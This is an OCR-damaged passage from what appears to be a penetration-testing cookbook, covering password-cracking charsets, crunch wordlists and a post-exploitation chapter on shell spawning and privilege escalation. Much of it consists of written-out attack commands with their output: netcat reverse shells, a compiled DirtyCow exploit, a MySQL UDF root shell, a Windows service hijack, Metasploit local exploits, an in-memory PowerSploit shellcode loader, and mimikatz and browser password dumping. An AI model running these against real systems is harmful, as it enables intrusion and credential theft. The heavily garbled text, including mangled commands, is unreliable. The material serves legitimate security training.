# charset configuration file for winrtgen v1.2 by 
# compatible with rainbowcrack 1.1 and later by 


Massimiliano Montoro (mao@oxid.it) 
Zhu Shuanglei <shuanglei@hotmail.com> 


hex - Lower = [0123456789abcdef ] 
hex-upper = [0123456789ABCDEF ] 
numeric = [0123456789] 
numeric-space = [0123456789 ] 
symbols14 ] 


symbols14-space 


1) 
—< 


mbols-all 


| @#$%7G*() -_+ 
| @#$%7*E*() -_+ 


oul 


] 


- +=~ 


| @#$%“E* ( 











b = )-_+=~" L1{}F1\ , 

symbols-all-space = [!@#$%78*() -_+=~" []{ I\: <>paey | 

ualpha = [ABCDEFGHI JKLMNOPQRSTUVWXYZ] 

ualpha-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ] 

ualpha-numeric = [ABCDEFGHI JKLMNOPQRSTUVWXY 20123456789 ] 

ualpha-numeric-space = [ABCDEFGHI JKLMNOPQRSTUVWXY 20123456789 ] 

ualpha-numeric-symbol14 = [ABCDEFGHI JKLMNOPQRSTUVWXY 20123456789! @#$%“&* () -_+=] 
ualpha-numeric-symbol14-space = [ABCDEFGHI JKLMNOPQRSTUVWXYZ0123456789! @#$%*&*()-_+= ] 
ualpha-numeric-all = [ABCDEFGHI JKLMNOPQRSTUVWXY 20123456789! @#$%*&*()-_+=~>[]{}| <>, .?/] 
ualpha-numeric-all-space = [ABCDEFGHI JKLMNOPQRSTUVWXY 20123456789! @#$%7&*() -_+= is a Is sm Se | 


5. This will generate a list of a minimum length and maximum length of 2, containing lowercase 
alphabets. Crunch also has a -t switch, which can be used to create a word list of a specific pattern: 

@: This will insert lowercase characters 

_: This will insert uppercase characters 

%: This will insert numbers 

: This will insert symbols 

6. Switch -» can be used to specify the size of the file you want to create: 


> 


nch 10 10 -t @@packt,,% -b lmib -o START 


generate the following amount of data: 


Crunch will now generate the following number of lines: 


avlalelal 2% completed generating output 





avlalelal 4% completed generating output 


7. Let's try to create a list with a specific pattern and of 1 MB in size: 


| crunch 10 10 -t @@packt,,% -b 1mib -o START 


8. Once it's, done, we will see a list of text files created with the pattern in the same folder: 


ubpackt TM5-uppacktWC9.tx 
uppacktWDO-vdpacktYT4.tx 
VdpacktYT5-vspacktBJg 
Vvspackt BKO- wgpacktEA4 
EA5-wupacktGQ9 
packt Jia. 





empackt rye e 


packtZz9. 


9. The -z flag can be used to create a word list and save it ina compressed file. The compression is 
done on the go: 


| crunch 10 10 -t @@packt,,% -b 1mib -o START -z gzip 


The following screenshot shows the output of the preceding command: 


qvpacktDR4. 
jpacktGH9. 


cktLo9g. 
ZpacktOF4. 


[Ulejelelelan : 
vdpacktYT4. 

packtBJ9. 
gpacl A4. 


feet aeaeaeae| 


ipacktJH 


yackt 





Have Shell Now What? 


In this chapter, we will cover the following recipes: 


Spawning a TTY shell 

Looking for weakness 

Horizontal escalation 

Vertical escalation 

Node hopping: pivoting 

Privilege escalation on Windows 
PowerSploit 

Pulling plaintext passes with mimikatz 
Dumping other saved passwords from the machine 
Pivoting 

Backdooring executables for persistence 


Introduction 


This is privilege escalation, as described on Wikipedia, privilege escalation is the act of exploiting a 
bug, design flaw, or configuration oversight in an operating system or software application to gain 
elevated access to resources that are normally protected from an application or user. This results in 
unauthorized access to resources. Two types of privilege escalation are possible: 


e Horizontal: This occurs in conditions where we are able to execute commands or functions that 
were not originally intended for the user access we currently have 

e Vertical: This kind of exploitation occurs when we are able to escalate our privileges to a higher 
user level, for example, getting root on the system 


In this chapter, you will learn the different ways of escalating our privileges on Linux and Windows 
systems as well as gaining access to the internal network. 


Spawning a TTY Shell 


We have covered different types of privilege escalation. Now let's look at some examples on how to get a 
TTY shell on this system. A TTY showcases a simple text output environment, that allows us to type 
commands and get the output. 


How to do it... 


1. Let's look at the following example, where we have a web application running zenPHOTO: 


/ CI \pHoto 


Login 
Password* 
*Enter 
CAPTCHA in 
place of 9On8F 
Password to S 
request a 
password reset 
&% Login © Reset 


2. The zenPHOTO already has a public exploit running, which we get access to via a limited shell: 


:~# php zenphoto.php 192.168.1.150 /zenphoto/ 


| 
a 


s.auth.php 

.file.php 

-history.php 

-1mage.php 

. manager .php 

. pagination.php 

.search.php 

.session.php 

.sessionaction.php 

.upLoad.php 
onfig.base.php 
onfig.php 
onfig.tinymce.php 


f unction.base.php 





eenphoto-shell# 


3. Since this is a limited shell, we try to escape it and get a reverse connection by first uploading netcat 
on the system and then using netcat to gain a backconnect: 


| wget x.x.x.x/netcat -o /tmp/netcat 


renphoto-shell# wget 192.168.1.148/netcat -O /tmp/netcat 


Fenphoto-shell# ls /tmp 
nsperfdata_jenkins 
nsperfdata_tomcat7 
etty-0.0.0.0-9000-w 

- - 1712433994 


|e) let- Am we) or- hea 8) 
Lnstone4824217418080607077. jar 





4. Now we can backconnect using the following command: 


| netcat <our IP > -e /bin/bash <port number> 





5. Looking at our Terminal window, where we had our listener setup, we will see a successful 
connection: 


| nc -lnvp <port number> 


istening on [any] 443 ... 

192.168.1.150: inverse host lookup failed: Unknown host 

connect to [192.168.1.148] from (UNKNOWN) [192.168.1.150] 36128 
ie 

U1d=33(www-data) gid=33(www-data) groups=33(www- data) 





Let's get a more stable TTY shell; assuming it's a Linux system, we already have Python installed on it and 
we can get a shell using this: 


| python -c ‘import pty; pty.spawn("/bin/sh")' 





www- data@canyoupwnme: /var /www$ 


We now have a much better way to execute commands. Sometimes, we may find ourselves in a situation in 
which the shell we gain access to via ssh or another method is a limited shell. 


One very famous limited shell is ishe11, which allows us to run only a few commands, such as echo, 1s, help, 
and so on. Escaping 1she11 is easy as all we have to do is type this: 


| echo os.system('/bin/bash' ) 
And we have access to a command shell with no more limits. 
Shell Spawning 
python -c ‘import pty; pty.spawn("/bin/sh") ' 
echo os.system('/bin/bash' ) 
/bin/sh -i 
perl -e ‘exec "“/bin/sh";' 


perl: exec “/bin/sh"; 


There's more... 


There are various other ways to spawn a TTY shell using Ruby, Perl, and so on. This can be seen at httpy/n 
etsec.ws/?p=337. 


Looking for weakness 


Now that we have a stable shell, we need to look for vulnerabilities, misconfigurations, or anything that 
will help us in escalating privileges on the system. In this recipe, we will look at some of the ways in 
which privileges can be escalated to get the root of the system. 


How to do it... 


The basic step I would recommend to all of you after we have a shell ona server is to do as much 
enumeration as possible: the more we know, the better we have a chance of escalating privileges on the 
system. 


The key steps to escalating privileges, as mentioned on gotmi1k, on a system are as follows: 


Collect: Enumeration, more enumeration, and some more enumeration. 

Process: Sort through data, analyze, and prioritize. 

Search: Know what to search for and where to find the exploit code. 

Adapt: Customize the exploit so it fits. Not every exploit works for every system out of the box. 
Try: Get ready for (lots of) trial and error. 


We will look at some of the most common scripts available on the internet, which makes our job easier by 
printing out whatever we need in a formatted manner. 


The first one is Linenum, which is a shell script created by the reboot user. It performs over 65 checks and 
shows us everything we need to start with: 


¢ Example: ./LinEnum.sh -k keyword -r report -e /tmp/ -t 
OPTIONS: 


¢ -k Enter keyword 

« -e Enter export location 

¢ -t Include thorough (lengthy) tests 
* -r Enter report name 


« -h Displays this help text 


Seeing the source code, we will see that it will display information such as kernel version, user info, 
world-writable directories, and so on: 


#basic kernel info 

unameinfo= uname -a 2>/dev/null” 

if [ “$unameinfo” ]; then 
echo -e "\e[@8;31mKernel information: \e[@@m\n$unameinfo" |tee -a $report 2>/dev/null 
echo -e “\n" |tee -a $report 2>/dev/null 

else 


fi 


procver= cat /proc/version 2>/dev/null” 

if [ “$procver" ]; then 
echo -e “\e[@8;31mKernel information (continued): \e[@@m\n$procver" |tee -a $report 2>/dev/null 
echo -e “\n" |tee -a $report 2>/dev/null 


else 

fi 

#search all *-release files for version info 
ee re ee oe 


The next script we can use is Linuxprivchecker. It is made in Python. This script also suggests privilege 
escalation exploits that can be used on the system: 


# Networking Info 
print "[*] GETTING NETWORKING INFO...\n" 


netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", “results":results}, 
"ROUTE": {"cmd":"route", “msg":"Route", "“results":results}, 
"NETSTAT": {"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", “results": results} 
} 


netInfo = execCmd(netInfo) 
printResults(netInfo) 


# File System Info 
print "[*] GETTING FILESYSTEM INFO...\n" 


driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", “results":results}, 
"FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "“msg":"fstab entries", “results": results} 
} 


These scripts are easy to find on Google; however, more information about this or the 
manual commands we can use to do the job ourselves can be found at http://netsec.ws/?p=309 
and GOtmilk's blog https://blog.g0tmi1k.conv. 





One more great script was created by arroway (https://twitter.com/ArrOway). He made it available on his blog, https 
//highon.coffee/blog/linux-local-enumeration-script. We can read the source code available on the blog to check 
everything the script does: 


"SBLUE#H# $RED /etc/fstab File Contents" 

Hy nM 

“$BLUE" 

ngegn 

Hy yt 

'9sks\n' "${COLUMNS:-$(tput cols)}" '' | tr 
Hy yt 

"SN 


at /etc/fstab 


"Ssks\n' "${COLUMNS:-$(tput cols)}" '' | tr 
atin 

"\n" 

“u $RED" 

"SBLUE## $RED /etc/passwd File Contents" 





Horizontal escalation 


You have already learned how to spawn a TTY shell and perform enumeration. In this recipe, we will 
look at some of the methods where horizontal escalation can be done to gain more privileges on the 
system. 


How to do it... 


Here, we have a situation where we have got a reverse shell as www-data. 


Running sudo --1ist, we find that the user is allowed to open a configuration file as another user, waldo: 


Matching Defaults entries for www-data on ubuntu: 
env reset, mail badpass, 
secure path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 


User www-data may run the following commands on ubuntu: 
CT Recee Mma wh) eee /uSr/bin/vim /etc/apache2/sites-available/000-default.conf 
(ALL) NOPASSWD: /sbin/iptables 





So, we open up the config file in VI Editor, and to get a shell in VI, we type this in the VI’s command line: 


| !bash 


uid=1000(waldo) gid=1000(waldo) groups=1000(waldo) ,24(cdrom) ,3 
mbashare) 





We now have a shell with the user waldo. So, our escalation was successful. 


In some cases, we may also find authorized keys in the ssh directory or saved passwords, 
that help us perform horizontal escalation. 





Vertical escalation 


In this recipe, we will look at some examples using which we can gain access to a root account ona 
comprised box. The key to a successful escalation is to gather as much information as possible about the 
system. 


How to do it... 


The first step of rooting any box would be to check whether there are any publically available local root 
exploits: 


1. We can use scripts such as Linux Exploit Suggester. It is a script built in Perl where we can specify 
the kernel version and it will show us the possible publicly-available exploits we can use to gain 
root privileges. The script can be downloaded from https://github.com/PenturaLabs/Linux_Exploit_Suggester! 


| git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester .git 


Andrew Davies bug fixes and added cve-2014-0196 Latest commit 9db2#5a on 19 May 20 
=| LICENSE Initial commit 4 years ai 
=) Linux_Exploit_Suggester.pl bug fixes and added cve-2014-0196 3 years a 
=) README.md Update README.md 4 years a! 


README.md 


Linux_Exploit_Suggester 


Linux Exploit Suggester; based on operating system release number. 


This program run without arguments will perform a ‘uname -r' to grab the Linux Operating Systems release version, 
and return a suggestive list of possible exploits. Nothing fancy, so a patched/back-ported patch may fool this script. 


Additionally possible to provide '-k' flag to manually enter the Kernel Version/Operating System Release Version. 


This script has been extremely useful on site and in exams. Now Open-sourced under GPLv2. 


2. Now we go to the directory using the ca command: 


| cd Linux_Exploit_Suggester/ 


3. It is simple to use, and we can find the kernel version by command: 


| uname -a 


4. We can also use the enumeration scripts that we saw in the previous recipe. Once we have the 
version, we can use it with our script with the following command: 


| perl Linux_Exploit_Suggester.pl -k 2.6.18 


ter# perl Linux_Exploit Suggester.pl -k 
Kernel local: 2.6.18 


earching among 65 exploits... 


ible Exploits: 


erican-sign- language 





Let's us try using one of the exploits; we will be using the latest one that came out, that is, dirty cow. 


This is the definition of dirty cow as explained by RedHat: a race condition was found in the way the 
Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only 
memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read- 
only memory mappings and thus increase their privileges on the system. 


The exploit code can be seen on exploit DB at https://www.exploit-db.com/exploits/40839/. This particular exploit 
adds a new user tO etc/passwd With root privileges: 


; . 
EXE Lol ; Home Exploits Shellcode Papers Google Hacking | 


E-DB Verified: 7 Exploit: § Download/[View Raw Vulnerable App: [ij 





« Previous Exploit 


EDB-Note: After getting a shell, doing "echo @ > /proc/sys/vm/dirty_writeback_centisecs” may make the 


This exploit uses the pokemon exploit of the dirtycow vulnerability 
as a base and automatically generates a new passwd line. 

The user will be prompted for the new password when the binary is run. 
The original /etc/passwd file is then backed up to /tmp/passwd.bak 
and overwrites the root account with the generated line. 

After running the exploit you should be able to login with the newly 
created user. 


To use this exploit modify the user values according to your needs. 
The default is "firefart". 


Original exploit (dirtycow's ptrace_pokedata "pokemon" method): 
https: //github.com/dirtycow/dirtycow. github. io/blob/master/pokemon.c 


Compile with: 
gcc -pthread dirty.c -o dirty -lcrypt 


Then run the newly create binary by either doing: 
"./dirty” or "./dirty my-new-password" 


Afterwards, you can either "su firefart" or "ssh firefart@..." 


DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT! 
mv /tmp/passwd.bak /etc/passwd 


Exploit adopted by Christian "FireFart" Mehlmauer 
httns://firefart.at 


We download the exploit and save it on the server's /tmp directory. It's written in C language, so we can 
compile it using gcc on the server itself using the following command: 


| gcc -pthread dirty.c -o <outputname> -1lcrypt 


www-data@Sedna:/tmp$ gcc -pthread -o dirty 40839.c -lcrypt 
gcc -pthread -o dirty 40839.c -lcrypt 

Wwww-data@Sedna:/tmp$ ./dirty 

./dirty 

/etc/passwd successfully backed up to /tmp/passwd.bak 
Please enter the new password: firefart 


Complete line: 
firefart: fik57D3GJz/tk:0:0: pwned: /root:/bin/bash 





We chmod (change file permissions) the file using this: 


| chmod +x dirty 


And then we run it using ./dirty. We will lose our backconnect access, but if everything goes well, we can 
now ssh into the machine as the root with the username firefart and password firefart. 


We try the ssh using this command: 
| ssh -1 firefart <IP Address> 


:~# ssh -l firefart 192.168.1.159 
firefart@192.168.1.159's password: 
Added user firefart. 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686) 
* Documentation: https://help.ubuntu.com/ 


System information as of Thu Mar 16 09:11:50 EDT 2017 


System load: 0.0 Memory usage: 5% Processes: 60 
Usage of /: 29.7% of 7.26GB Swap usage: 0% Users logged in: 0 


Graph this data and manage this system at: 
https://landscape. canonical.com/ 


Last login: Sun Mar 12 00:41:47 2017 from 192.168.0.126 
firefart@Sedna:~# echo 0 > /proc/sys/vm/dirty_writeback centisecs 





Now, dirty cow is a bit unstable, but we can use this workaround to make it stable: 
| echo © > /proc/sys/vm/dirty_writeback_centisecs 
Let's execute the command ID; we will see that we are now root on the system! 


Tfirefart@Sedna:~# echo 0 > /proc/sys/vm/dirty writeback centisecs 
firefart@Sedna:~# id 





uid=0(firefart) gid=0(root) groups=0( root) 


Now let's look at another method to achieve the root. In this situation, we will assume that we have a shell 
on system and the enumeration scripts we ran showed us that MySQL process is running as the root on the 
system. 


Lookup failed: Unknown serve 
15 38. l 35 ] from ( UNKNOWN) [ 192 
SMP Fri Feb 17 10:40:05 EST 2 


user, load average: 0.00, | 





MySQL has a feature called User Defined Functions (UDF); let's look at a way to get root via UDF 
injection. Now we have two options: either download the code and compile on the compromised system 
or download a precompiled code from https://github.com/mysqludf/lib_mysqludf_sys/blob/master/lib_mysqludf_sys.so. 





Once it has been downloaded, we log in to the database. Usually, people leave the default root password 
blank; or, we can get one from the config files of the web application running on the server. 


Now, we create a table and insert our file into the table using these commands: 


create table <table name> (hello blob); 
insert into <table name> values (load_file('/path/to/mysql.so')); 
select * from <table name> into dumpfile '/usr/1lib/mysql1/plugin/mysqludf.so'; 


Values(load file('/tmp/mysqludf.so') 


de into dumpfile usr/lib mysql plugin mysqludf.so'; 
nN sys eval returns integer soname ‘mysqludf.so'; 





For Windows systems, the commands are the same; only the path to MySQL would be 
different. 





Next, we create a sys_eval function, that will allow us to run system commands as the root user. For 
Windows, we run this command: 


| CREATE FUNCTION sys_ eval RETURNS integer SONAME 'lib_ mysqludf_sys_32.d11'; 


For Linux, we run this command: 


| CREATE FUNCTION sys_eval RETURNS integer SONAME 'mysqludf.so; 


Now we Can use sys_eval for anything we want; for example, to backcomnect, we can use this: 


| select sys_eval('nc -v <our IP our Port> -e /bin/bash'); 


bin/bash'); 





This will give us a reverse shell as the root on the system: 


:~# nc -lvp 1234 
Listening on [any] 1234 ... 
kup failed: Unknown serve 
(UNKNOWN) [ 





Ue ReL Cl @gcleh@ mmep eel Cl @aeleh@) 


There are other ways too, such as adding our current user to the sudoers file. It's all up to our imagination. 


Node hopping — pivoting 


Once we are in one system on the network, we need to now look for other machines on the network. 
Information gathering is the same as what we learned in the previous chapters. We can start by installing 
and using nmap to look for other hosts and the application or services running. In this recipe, you will 
learn about a few tricks to get access to the port in the network. 


How to do it... 


Let's assume we have shell access to a machine. We run ipconfig and find that the machine is connected to 
two other networks internally: 


thebobs@Initech-DMZ01:~$ ifconfig 


ethd 


Link encap:Ethernet HWaddr 00:0c:29:59:79:84 

inet addr:192.168.1.5 Bcast:192.168.1.255 Mask:255.255.255.0 
inet6 addr: fe80::20c:29ff:fe59:7984/64 Scope:Link 

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:6950 errors:0 dropped:0 overruns:0 frame:0 

TX packets:182 errors:0 dropped:0 overruns:0 carrier:0 
collisions:@ txqueuelen: 1000 

RX bytes:436168 (436.1 KB) TX bytes:21779 (21.7 KB) 


Link encap:Local Loopback 

inet addr:127.0.0.1 Mask:255.0.0.0 

inet6 addr: ::1/128 Scope:Host 

UP LOOPBACK RUNNING MTU:65536 Metric:1 

RX packets:9 errors:0 dropped:9 overruns:0 frame:0 
TX packets:6 errors:0 dropped:@ overruns:0 carrier:0 
collisions:0 txqueuelen:1 

RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 


Link encap:Ethernet HWaddr fe:54:00:4b:73:5f 

inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:24 errors:@ dropped:0 overruns:0 frame:0 

TX packets:13 errors:0 dropped:9 overruns:9 carrier:0 

collisions:0 txqueuelen: 1000 

RX bytes:2796 (2.7 KB) TX bytes:2059 (2.0 KB) 





Now we nmap scan the network and find some machines with a couple of ports open. You learned about a 
cool way of pivoting into the networks so that we can access the applications running behind other 
network on our machine. 


We will do a ssh port forward using the following command: 


| ssh -L <our port> <remote ip> <remote port> username@IP 


:~# ssh -L 9001:192.168.122.65:80 thebobs@192.168.1.5 | 





Once this is done, we open the browser and go to the port number we used: 


http://127.0.0.1:9001/ x +* 


> 127.0.0.1 


fj Most Visited» Offensive Security ‘A KaliLinux ‘&KaliDocs ‘A Kali Toots [Exploit-DB WAircra 


Initech Employ 





Directory 

PDF Converter 
IPS Archive 
Admin 
Support Ticket 


Initech 


For issues with the intranet site contact the 





We will have access to the application running on the remote host. 


There's more... 


There are other ways to port forward; for example, using proxychains will help you dynamically forward 
the ports running on a server inside a different network subnet. Some of the techniques can be found at https 
//highon.coffee/blog/ssh-meterpreter-pivoting-techniques/. 


Privilege escalation on Windows 


In this recipe, you will learn a few ways to get the administrator account on the Windows Server. There 
are multiple ways to get administrator rights on a Windows system. Let's look at a few ways in which this 
can be done. 


How to do it... 


Once we have meterpreter on the system, Metasploit has an inbuilt module to try three different methods 


to get admin access. First, we will see the infamous getsystem of Metasploit. To view the help, we type 
this: 


| getsystem -h 


meterpreter > getsystem —h 
Usage: getsystem [options] 


Attempt to elevate your privilege to that of local system. 


OPTIONS: 


-h Help Banner. 
-t <opt> The technique to use. (Default to '@'). 
@ : All techniques available 
1 : Service — Named Pipe Impersonation (In Memory/Admin) 
2 : Service — Named Pipe Impersonation (Dropper/Admin) 
3 : Service — Token Duplication (In Memory/Admin) 





meterpreter > 


To try and get admin, we type the following command: 


| getsystem 





We can see we are NOW NT auTHorITy\system. Sometimes, this technique may not work, so we try another way 
to get the system on the machine. We will look at some ways to reconfigure Windows services. 


We will use sc ( known as service configuration) to configure Windows services. 
Let's look at the upnphost service: 


| sc qc upnphost 


SERVICE_NAME: upnphost 





C:\Documents and Settings\test Desktop>if 


First, we upload our netcat binary on the system. Once that's done, we can change the binary path of a 
running service with our binary: 


| sc config upnphost binPath= "<path to netcat>\nc.exe -nv <our IP> <our port> -e C:\WINDOWS\System32\cmd.exe" 


ttings\test\Desktop>sc config upnphost binpath= "C:\nc.exe -nv 192.168.110.41 
' 


192.168.116.41 1234 -e C:\Windows\System32\cmd.exe" 





sc config upnphost obj= ".\LocalSystem" password= "" 


C:\Documents and S ings\test\D sc config upnphost obj= ".\LocalSystem" password= 
config upnp ’ ; ; ae 


[SC] ChangeServi 


C*\Dc nd Sec 


:\Documents and 5 


SERVICE_NAME: upnphost 
WIN32_ SHARE PROCESS 


c.exe -nv 192.168.116.41 1234 -e C:\Windows\System32\cmd.exe 
al Plug and Play Device Host 


: LocalSystem 


c:\Documents and Settings\test\Desktop> 





Now we need to restart the service, and once that's done, we should have a back connection with admin 
privileges: 


|net start upnphost 


Instead of netcat, we can also use the net user add Command to add a new admin user to the system, among 
other things. 


Now let's try another method: Metasploit has a lot of different local exploits for Windows exploitation. 
To view them, we type iN msfconsole USE exploit/windows/local <tab>. 


/Local/ 
dobe_sandbox_adobecollabsync 
gnitum_outpost_acs 
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eweeer=) 
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D ( WD | 


Cc 


=e 


c 
@ 


y _event vwr 
odg@ibypa ac_injection 
ocal/bypassuac_vbs 
ocal/capcom_sys_ exec 
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[= 
NNnNNnNNnNHnH Hn YH 
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ocal/ /mqac._ write 


We will use kitrapod to exploit. Use exploit/windows/local/ms10_015_kitrapod. We set our meterpreter session 
and payload: 


msf exploit(ms10_015_kitrap@d) set SESSION 1 

msf exploit(ms10_015_kitrap@d) set PAYLOAD windows/meterpreter/reverse_tcp 
msf exploit(ms10_015_kitrap@d) set LHOST 192.168.110.6 

msf exploit(ms10_015_kitrap@d) set LPORT 4443 

msf exploit(ms10_015_kitrap@d) show options 


Module options (exploit/windows/local/ms10_015_kitrap@d): 


Name Current Setting Required Description 


SESSION 1 yes The session to run this module on. 


Payload options (windows/meterpreter/reverse_tcp): 


Name Current Setting Required Description 


EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) 
LHOST 192.168.110.6 yes The listen address 
LPORT 4443 yes The listen port 


Exploit target: 
Id Name 


4) Windows 2K SP4 — Windows 7 (x86) 





We then run the exploit: 


msf exploit(ms10_015_kitrap@d) > exploit 


[*] Started reverse handler on 192.168.110.6:4443 

[*] Launching notepad to host the exploit... 

[+] Process 4048 launched. 

[*] Reflectively injecting the exploit DLL into 4048... 
[*] Injecting exploit into 4048 ... 

[*] Exploit injected. Injecting payload into 4048... 


[*] Payload injected. Executing exploit... 

[+] Exploit finished, wait for (hopefully privileged) payload execution to complete. 

[*] Sending stage (769024 bytes) to 192.168.110.7 

[*] Meterpreter session 2 opened (192.168.110.6:4443 -—> 192.168.110.7:49204) at 2017-03-11 11:14:00 -—0400 


meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM 





We have the admin. Let's use one more exploit: the infamous bypassuac: 


| use exploit/windows/local/bypassuac 


We now set the session of our current meterpreter, which we have on the system: 


| set session 1 


We run and see a second meterpreter with admin privileges open for us: 


168.116.41:4444 


Defaul 
wit e} "7 of -| 
Administrators group! 


the agent 


this set 


2 files 

s Long being uploaded.. 
116.31 

9.41:4444 


erpret 


Talon nals) 


re 





Using PowerSploit 


With the launch of PowerShell, new ways to exploit Windows machine also came in. As described by 
Wikipedia, PowerShell (including Windows PowerShell and PowerShell Core) is a task automation and 
configuration management framework from Microsoft, consisting of a command-line shell and associated 
scripting language built on the .NET Framework. 


In this recipe, we will use PowerSploit, which is a PowerShell-based post exploitation framework to 
gain access to meterpreter on a system. 


How to do it... 


Following are the steps to use PowerSploit: 


1. 


We will now assume a situation in which we have a Windows-based environment in which we have 
managed to gain shell access. We do not have admin rights on the system. 


Let's look at a cool way of getting a meterpreter without actually downloading a file on the system 
using PowerSploit. It comes inbuilt with Kali in Menu. 


Favorites backdoor-factory 


01 - Information Gathering 
bdfproxy 
02 - Vulnerability Analysis 


intersect 


03 - Web Application Analysis 


04 - Database Assessment nishang 


O05 - Password Attacks 
powerspLoit 
06 - Wireless Attacks 


- Reverse Engineering proxychains 


- Exploitation Tools weevely 


- Sniffing & Spoofing 





- Post Exploitation 


The trick here will be to download a PowerShell script and load it into memory, and as it is never 
saved on HDD, the antivirus will not detect it. 
We first check whether PowerShell is installed by running powershe11: 


Copyright (C) 2009 Microsoft Corporation. All rights reserved. 





We will use the command. Using single quotes is important; else, we may get a missing parenthesis 
error: 


powershell IEX (New-Object Net.WebClient ) .DownloadString 
('https://raw.githubusercontent .com/PowerShel1lMafia/ 
PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1' ) 


PS C:\Users\( > IEX (New-Object Net.WebClient>.DownloadString<"https:// 


sau. githubusercontent .com/mattifestat ion/PowerSploit/master/CodeExecut ion/Invoke 
—Shellcode.psi''> 





We should not see any error. Now that our script is all set, we invoke the module and see help with 
the following command: 


Get-Help Invoke-Shellcode 


AME 


Invoke-Shellcode 


BYNOPSIS 
Inject shellcode into the process ID of your choosing or within the context 
of the running PowerShell process. 


PowerSploit Function: Invoke-Shellcode 
Author: Matthew Graeber (@mattifestation> 
License: BSD 3-Clause 

Required Dependencies: None 

Optional Dependencies: None 


Invoke-Shellcode [—ProcessID <UInt16>] [-Shellcode <Byte[1>1] [-Force] [-Wha 
tIf] [-Confirm] [<CommonParameters >] 





Invoke—-Shellcode [—ProcessID <UInti16>] [—Payload <String>] —Lhost <String> 


7. Now we run the module: 


powershell Invoke-Shellcode -Payload 
windows/meterpreter/reverse_https -Lhost 192.168.110.33 
-Lport 4444 -Force 


powershell Invoke-Shellcode —Payload windows/meterpreter/reverse_https —Lhost 192.168.110.33 -—Lport 4444 —Force 





8. Before we run the preceding script, we start our handler. 


> use exploit/multi/handler 

exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https 
exploit(handler) > set LHOST 192.168.110.33 

exploit(handler) > set LPORT 4444 

exploit(handler) > exploit 





9. We should have a meterpreter now. 


[*] 
[*] 
[*] 
[*] 
[*] 
[*] 
[x] 
[*] 
[x] 
[*] 


Started HTTPS reverse handler on https://0.0.0.0:4444/ 

Starting the payload handler... 

192.168.1.5:49238 Request received for /INITM... 

192.168.1.5:49238 Staging connection for target /INITM received... 


Pat 
Pat 
Pat 
Pat 
Pat 


ched user-agent at offset 663246... 

ched transport at offset 663320... 

ched URL at offset 663384... 

ched Expiration Timeout at offset 664256... 
ched Communication Timeout at offset 664260... 


Meterpreter session 1 opened (192.168.110.33:4444 —> 192.168.110.5:49230) at 2017-04-05 09:35:10 -—8500 





meterpreter > 


10. Now since we have meterpreter, we can use any of the recipes mentioned earlier to get system rights. 


There's more... 


PowerSploit has lots of PowerShell modules that can be used for further exploitation, such as gaining 
privileges, bypassing antivirus, and so on. 


We can read all about this at: 


© https://github.com/PowerShellMafia/P owerSploit 
® https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-powersploit-part- 1-evading-antivirus-software-0165535/ 


Pulling plaintext passwords with mimikatz 


Now that we have a meterpreter, we can use it to dump passwords from the memory. Mimikatz is a great 
tool for this. It tries and dumps the password from the memory. 
As defined by the creator of mimikatz himself: 


"It is made in C and considered as some experiments with Windows security" It's now well known to 
extract plaintexts passwords, hash, and PIN code and kerberos tickets from memory. Mimikatz can also 
perform pass-the-hash, pass-the-ticket or build Golden tickets." 


How to do it... 


Following are the steps to use mimikatz: 


1. Once we have the meterpreter and system privileges, we load up mimikatz using this command: 
| load mimikatz 


D mimikatz 


Command Description 


kerberos Attempt to retrieve kerberos creds 
D Attempt to retrieve Livessp creds 
mimikatz command Run a custom command 
msv Attempt to retrieve msv creds (hashes) 
Attempt to retrieve ssp creds 
tspkg Attempt to retrieve tspka creds 
wdigest Attempt to retrieve wdigest creds 





2. To view all the options, we type this command: 


| help mimikatz 


3. Now in order to retrieve passwords from the memory, we use the built-in command of Metasploit: 


| msv 


Password 


lm{ aad3b435b51404eeaad3b435 


Lm{ aad3b435b51404eeaad3b435 


KGRO WIN-U O8¢ .s. (Credentials KO) 

NT AUTHORITY : -S. (Credentials KO) 
s. (Credentials KO) 

WORKGROUP WIN-UH33216CD08$ -S. (Credentials KO) 


meterpreter > §j 





4. We can see that the NTLM hashes are shown on the screen. To view Kerberos credentials, we type 
this: 


| kerberos 


meterpreter > kerberos 
Running as SYSTEM 


User Password 
0;76485 Nh WIN-UH332I0CD08 bugsbounty 
0;76445 WIN-UH332I0CD08 bugsbounty 
0 3997 Negotiate NT AUTHORITY LOCAL SERVICE 
0 ;996 Negotiate WORKGROUP WIN-UH33216CD08$ 
6;25380 NTLM 
0 ;999 NTLM WORKGROUP WIN-UH33210CDO8$ 





If there were any credentials, they would have been shown here. 


Dumping other saved passwords from the 
machine 


You have already learned about dumping and saving plaintext passwords from the memory. However, 
sometimes, not all passwords are dumped. Not to worry; Metasploit has other post-exploitation modules, 
using which we can gather saved passwords of different applications and services running on the server 
we compromised. 


How to do it... 


First, let's check what applications are running on the machine. We use this command: 


| use post/windows/gather/enum_applications 


) > use post/windows/gather/enum_applications 
) > show options 


Module options (post/windows/gather/enum_ applications) : 


Name Current Setting Required Description 


The session to run this module on. 





We see the options; now all we need is our session, using the following command: 


| set session 1 


Run it and we will see the list of applications installed on the system: 





Now that we know what applications are running, let's try to collect more information. 


We will use use post/windows/gather/enum_chrome. 


It will gather all the browsing history, saved passwords, bookmarks, and so on. Again, we set our session 


and run this: 


enum 


enum 


